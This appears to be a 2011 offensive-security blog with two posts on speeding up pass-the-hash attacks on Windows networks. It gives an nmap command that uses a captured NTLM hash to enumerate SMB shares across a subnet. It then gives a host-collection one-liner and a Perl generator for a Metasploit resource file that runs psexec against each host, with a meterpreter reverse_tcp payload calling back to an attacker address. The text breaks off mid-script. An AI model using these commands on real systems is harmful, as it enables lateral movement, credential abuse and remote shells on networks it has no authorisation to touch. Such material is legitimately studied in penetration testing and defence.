Friday, October 7, 2011

NMap & Pass-the-Hash

Let's speed up pwning the Enterprise another notch. In this scenario, we've obtained an account hash through a Man-in-the-Middle attack using, say, Easy-Creds. In my prior blog posts I showed how to automate a psexec attack across an entire IP range or list. But if the credentials aren't valid on all the targets it can take time to go through the entire range/list, waiting for the authentication to fail, the module to timeout and the 2 second sleep. There has to be a better way and there is.

Nmap supports the use of password hashes:

nmap -n -sT -p445 --script=smb-enum-shares.nse -script-args=smbuser=USER,smbhash=e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c,smbtype=v1,smbdomain=DOMAIN  -oN SMB-User.txt 10.110.10.1/24 --open -vv

HINT: To test using the local user password hashes, use "smbdomain=."

For further information:
(Look at smbtype)

Tuesday, October 4, 2011

A Faster psexec Attack

So, I got some pretty harsh feedback from my first blog post. "You really suck at scripting", they said. "You're a script-kiddie's script-kiddie!", they yelled. "What if I wanted to pass a list of IPs, smart boy? How would you do that?" I tried not to get defensive and replied, "Jeez Mom, relax, I'll come up a solution."

I've been using a perl script that lets me pass-the-hash against all IPs in a subnet range but I updated it to set the rhosts from a file instead. That way once I get a hash I want to try, I can nmap the environment and collect targets with just SMB ports to pass to the attack.

Start by pulling together the targets using nmap and the unix cut command:
nmap -p445 -Pn 192.168.1.1/24 -oG - | grep 445/open | cut -d' ' -f2 >> smb.txt

Then create the perl file that can be compiled into an MSF resource file.
----------------------------------------------------------------------
#!/usr/bin/perl -w
use strict;

my $input_file="smb.txt";
print "use windows/smb/psexec\n";
print "set SMBUser NAME\n";
print "set SMBPass HASH\n";
print "set PAYLOAD windows/meterpreter/reverse_tcp\n";
print "set LHOST XXX.XXX.XXX.XXX\n";
print "set LPORT 4444\n";

 open(IN, $input_file) or die "$input_file\n";
    while(<IN>) {
        chomp;
        print "set RHOST $_\n";
        print "exploit\n";
        print "sleep 2\n";